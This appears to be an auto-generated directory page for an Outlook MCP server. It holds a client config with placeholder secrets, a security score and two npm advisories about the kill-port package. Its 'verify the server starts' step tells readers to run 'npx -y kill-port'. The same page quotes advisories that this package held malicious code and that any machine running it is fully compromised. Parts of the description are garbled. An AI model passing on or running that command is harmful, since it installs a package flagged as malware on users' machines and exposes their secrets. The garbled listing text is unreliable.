Outlook MCP is an MCP server that MCP server for Claude to access Outlook data via Microsoft Graph API. Its tool list has not been published yet over stdio and sse, requires no API key, and scores 52/100 on MCPpedia's security, maintenance and efficiency rubric.
Config is the same across clients — only the file and path differ.
{
"mcpServers": {
"m365-assistant": {
"env": {
"USE_TEST_MODE": "false",
"OUTLOOK_CLIENT_ID": "your-client-id",
"OUTLOOK_CLIENT_SECRET": "your-client-secret"
},
"args": [
"/path/to/outlook-mcp/index.js"
],
"command": "node"
}
}
}Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
A comprehensive MCP (Model Context Protocol) server that connects Claude with Microsoft 365 services through the Microsoft Graph API and Power Automate API.
Run this in your terminal to verify the server starts. Then let us know if it worked — your result helps other developers.
npx -y 'kill-port' 2>&1 | head -1 && echo "✓ Server started successfully"
After testing, let us know if it worked:
Five weighted categories — click any category to see the underlying evidence.
Malicious code in kill-port (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (da8762d3a240cbf5a33e4b613b2ea601d5515824da362b82eed4b5095baa7b8c) The package kill-port was found to contain malicious code. ## Source: ghsa-malware (12e6ea3a28f8e792e2cac11bd7aa1651eed2f77b6468a8d9aa43567dc9e95bbd) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different comp
Command Injection in kill-port
Versions of `kill-port` prior to 1.3.2 are vulnerable to Command Injection. The package does not validate user input on the `kill` function. This may allow attackers to run arbitrary commands in the system if user input (such as the port number) is passed directly to the function. ## Recommendation Upgrade to version 1.3.2 or later.
Be the first to review
Have you used this server?
Share your experience — it helps other developers decide.
Sign in to write a review.
Others in productivity / communication
Asynchronous coordination layer for AI coding agents: identities, inboxes, searchable threads, and advisory file leases over FastMCP + Git + SQLite
MCP server for monday.com integration.
Local-first AI memory with knowledge graphs and hybrid search. 17+ AI tools via MCP. Free.
Programmable email inbox for AI agents — JMAP, PoW auth, stdio MCP server.
MCP Security Weekly
Get CVE alerts and security updates for Outlook Mcp and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.